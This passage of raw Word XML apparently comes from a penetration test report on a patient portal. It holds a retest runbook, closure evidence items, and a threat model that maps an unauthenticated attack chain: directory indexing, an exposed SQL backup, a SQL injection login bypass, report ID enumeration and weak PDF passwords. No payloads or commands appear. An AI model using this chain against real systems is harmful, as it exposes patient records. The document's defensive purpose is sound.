      <w:r>
        <w:t>Run a dynamic smoke test against authentication endpoints with quote/comment payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Verify that production error responses contain no database driver names or stack traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Test that a valid session can access its own report but cannot access another user’s report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Include secret scanning and artifact scanning before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>12. Retest Runbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The retest should be performed after remediation in a controlled maintenance window. The objective is not merely to see whether the original payload stops working; the objective is to verify that the underlying security invariant has been restored.</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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retest action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pass condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request /old/, /patient/ and /staff/ anonymously</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No directory indexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request the known SQL backup and common backup names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No sensitive content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Submit invalid credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No authenticated session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Submit quote/comment/boolean SQLi probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No state change; generic error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inspect response headers and error bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No DB implementation detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authenticate as a test patient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal opens only after valid authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request own report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200 only when authorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request another patient’s report ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>403/404; no content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enumerate sequential IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No cross-user disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inspect logs/SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected alerts for test activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest closure evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Before/after HTTP captures with sensitive tokens redacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots showing denied directory and backup access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication regression output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Authorization matrix for report objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deployment evidence showing sensitive artifacts are outside the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>SIEM/detection screenshots showing the expected alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>13. Threat Model &amp; Abuse Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment is best understood as an external attacker operating without credentials, relying on publicly reachable HTTP functionality and ordinary tooling. The following abuse cases convert the technical findings into realistic attacker objectives without assuming capabilities that were not demonstrated.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Abuse case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Entry condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed enabler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Discover restricted application surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthenticated HTTP access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory indexing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reduce externally enumerable attack surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Acquire internal business records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No credentials required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public SQL backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Keep sensitive data outside public web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bypass patient authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient login endpoint reachable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preserve authentication invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retrieve patient documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal session exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report download endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authorize each object server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recover protected document content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Encrypted PDFs acquired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Weak passwords + legacy protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use modern document protection and strong secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Identify defensive gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Verbose errors/fingerprints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL warnings + banners</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Minimize implementation disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Threat assumptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker has ordinary internet connectivity and can send HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker does not begin with a valid patient or staff credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker does not need social engineering or user interaction for the demonstrated chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker can perform offline analysis once files are legitimately retrieved from the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment does not assume access to the hosting provider control panel or unrelated shared-hosting tenants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
